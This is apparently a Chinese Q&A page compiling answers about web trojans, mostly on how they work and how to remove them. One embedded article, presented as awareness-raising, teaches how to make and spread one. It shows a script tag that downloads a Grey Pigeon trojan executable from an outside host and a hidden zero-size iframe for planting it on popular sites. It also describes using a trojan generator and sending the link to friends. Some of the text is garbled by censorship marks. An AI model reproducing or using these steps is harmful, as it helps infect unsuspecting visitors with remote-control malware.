网页木马怎么办
网页木马????
我不知道你所说的网页木马是什么。我来简单说一下一般意义上的网页木马(病毒)以及防御(不用杀毒软件)。
所谓网页木马就是在网页中嵌入一段代码,这段代码会利用windows系统/IE漏洞来使浏览器自动下载一个指定的程序,而这个程序就是真正的木马或者病毒文件。
所以可以看出防御网页木马的最简单途径
1、不适用windows系统,这个不仅仅是网页木马,基本上目前的99%的病毒都被屏蔽了。但是这个不现实,在中国使用linux的用户基本是被忽略的。
2、给系统打补丁,网页木马是利用windows漏洞来使电脑中毒的,如果电脑的那个漏洞已经被补上了,那么网页被嵌入的那段代码就不会起作用。这样即便浏览有木马的网页也不会中毒。
3、不使用IE内核浏览器,这个最简单了,目前有五大主流浏览器,除了IE还有4中选择,使用后,效果跟第2条一样。
什么是网页木马,深度剖析网页木马及如何手工清除
网马就是在网页中植入木马,你打开网页就运行了木马程序,使你在不知不觉中中毒。
网页木马实际上是一个HTML网页,与其它网页不同的是该网页是黑客精心 *** 的,用户一旦访问了该网页就会中木马。为什么说是黑客精心 *** 的呢?因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞,让IE在后台自动下载黑客放置在 *** 上的木马并运行(安装)这个木马,也就是说,这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始。
有朋友会说,打开一个网页,IE浏览器真的能自动下载程序和运行程序吗?如果IE真的能肆无忌惮地任意下载和运行程序,那天下还不大乱。实际上,为了安全,IE浏览器是禁止自动下载程序特别是运行程序的,但是,IE浏览器存在着一些已知和未知的漏洞,网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。
至于怎么清除,就安杀毒软件和防火墙和专杀木马工具!
为什么我访问每一个网页都会提示说有木马程序?
其网页本身没有病毒,而是你电脑很有可能中了IE病毒;这种的原理是,当你打开某网页时该病毒会把它引入另一个带有病毒网站;虽然表面是你所打开的网页,但是杀毒软件一定会提示你该网页有木马程序……
你在安全模式下彻底的清杀一下!
电脑自动弹出网页 而且网页含有木马程序
电脑被病毒木马感染,需要卸载原有的杀毒软件,去官方网站重新下载最新版本杀毒软件。
1、打开浏览器进入360卫士官网,下载最新版本的360卫士安装好。
2、打开360卫士选择查杀修复。
3、弹出框中选择全盘查杀,首次查杀会提示安装小红伞,直接选择安装。这样肯定能扫到电脑中的木马。
网页木马是怎么一回事
分类: 电脑/ *** 反病毒
问题描述:
什么地方可以下到 网页木马 软件啊~~~~~~~
解析:
“灰鸽子”网页木马从原理、 *** 到防范
1.网页木马的攻击原理- 2.为什么是灰鸽子- 3.网页木马的基本用法(1)- 4.网页木马的基本用法(2)- 5.网页木马的防范策略(1)- 6.网页木马的防范策略(2)-
编者按:事物都有两面性。本文介绍的网页木马 *** 技巧,意在加强大家的防范意识,而不是想“荼毒生灵”。希望能给大家带来一些帮助,营造一个安全的上网环境。
如果你访问××网站(国内某门户网站),你就会中灰鸽子木马。这是我一黑客朋友给我说的一句说。打开该网站的首页,经检查,我确实中了灰鸽子。怎么实现的呢?他说,他侵入了该网站的服务器并在网站主页上挂了网页木马;一些安全专家常说,不要打开陌生人发来的网址,为什么?因为该网址很有可能就是一些不怀好意者精心 *** 的网页木马。
以上只是网页木马的两种形式,实际上网页木马还可以挂在多媒体文件(RM、RMVB、WMV、WMA、Flash)、电子邮件、论坛等多种文件和场合上。很可怕吧,那么用户如何防范网页木马呢?下面我们就先从网页木马的攻击原理说起。
一、网页木马的攻击原理
首先明确,网页木马实际上是一个HTML网页,与其它网页不同的是该网页是黑客精心 *** 的,用户一旦访问了该网页就会中木马。为什么说是黑客精心 *** 的呢?因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞,让IE在后台自动下载黑客放置在 *** 上的木马并运行(安装)这个木马,也就是说,这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始。
有朋友会说,打开一个网页,IE浏览器真的能自动下载程序和运行程序吗?如果IE真的能肆无忌惮地任意下载和运行程序,那天下还不大乱。实际上,为了安全,IE浏览器是禁止自动下载程序特别是运行程序的,但是,IE浏览器存在着一些已知和未知的漏洞,网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。下面我举IE浏览器早期的一个漏洞来分别说明这两个问题。
⒈自动下载程序
SCRIPT LANGUAGE="icyfoxlovelace" src=//go163go.vicp/1.exe/SCRIPT
小提示:代码说明
a. 代码中“src”的属性为程序的 *** 地址,本例中“//go163go.vicp/1.exe”为我放置在自己Web服务器上的灰鸽子服务端安装程序,这段代码能让网页下载该程序到浏览它的电脑上。
b. 也可以把木马程序上传到免费的主页空间上去,但免费空间出于安全的考虑,多数不允许上传exe文件,黑客可能变通一下把扩展名exe改为bat或,这样他们就可以把这些程序上传到服务器上了。
把这段代码插入到网页源代码的/BODY…/BODY之间(如图1),然后用没打补丁的IE6打开,接下来,打开IE的临时目录Temporary Inter Files,你会发现,在该文件夹中有一个“1.exe”文件,这也就是说,该网页已自动下载了我放置在Web服务器上的灰鸽子木马。
二、网页木马的基本用法
理解了网页木马攻击的原理,我们可以 *** 自己的网页木马,但这需要你根据IE漏洞写出利用代码。实际上,在网上有很多高手已写出了一些漏洞的利用代码,有的还把它写成了可视化的程序。在搜索引擎输入“网页木马生成器”进行搜索,你会发现,在网上有很多利用IE的各种漏洞编写的网页木马生成器,它们大都为可视化的程序,只要你有一个木马(该木马必须把它放置到 *** 上),利用这些生成器你就可以立即生成一个网页,该网页就是网页木马,只要他人打开这个网页,该网页就可以自动完成下载木马并运行(安装)木马的过程。
在我的电脑上我已下载了一个网页木马生成器,下面我们来看怎么生成网页木马并让他人中木马。
之一步:启动该网页木马生成器,如图4所示,在文本框中输入木马的 *** 地址,最后单击“生成”。
图4 网页木马生成器
第二步:在网页木马生成器的安装文件夹会生成一个网页文件,该文件就是我们在上一步生成的网页木马。上传该文件到自己的Web服务器或免费主面空间。
现在好了,把上述网页在服务器上的地址(网址)通过 *** 发给自己的好友,一旦他访问了该网页,该网页就会在他的电脑上自动下载并运行你放置在 *** 上的木马。
现在你该明白安全专家劝告的“不要打开陌生人发来的 *** 地址”这句话的真谛了吧!实际上,即使人人都不打开陌生人发来的网址,也仍然有一些人“飞蛾补灯,自寻死路”,因为若大的Inter,总会有一些人会有意或无意地访问这些网址,而且,有些网页木马,还挂在一些知名网站上(根据知名网站的访问量,你算算吧,每天有多少人中了木马!)。
小提示:你可能还没想到,看电影,在论坛查看或回复帖子也能中木马。实际上,网页木马还可以挂在多媒体文件、电子邮件、论坛、CHM电子书上,这样,用户一旦观看电影、查看或预览邮件(主要是一些用电子邮件群发器发送的垃圾邮件)、参与帖子,打开电子书,用户就会中网页木马。
在下面我们只介绍黑客如何在知名网站上挂网页木马。下面来看这一段代码:iframe src=//go163go.vicp/ width=0 height=0 frameborder="0"/iframe
参考资料上很详细!!!!!
网站中病毒或者有木马怎么处理
网站其实本身肯定是不会中病毒的,只能是服务器里面存储的蓝本文件里面比如说某些图片和下载文件里面会存在木马病毒,而遇到了木马病毒后更好的办法自然就是想办法给电脑杀毒了,可以用电脑管家的病毒查杀功能,在服务器里面找出病毒查杀了,就行了。
0条大神的评论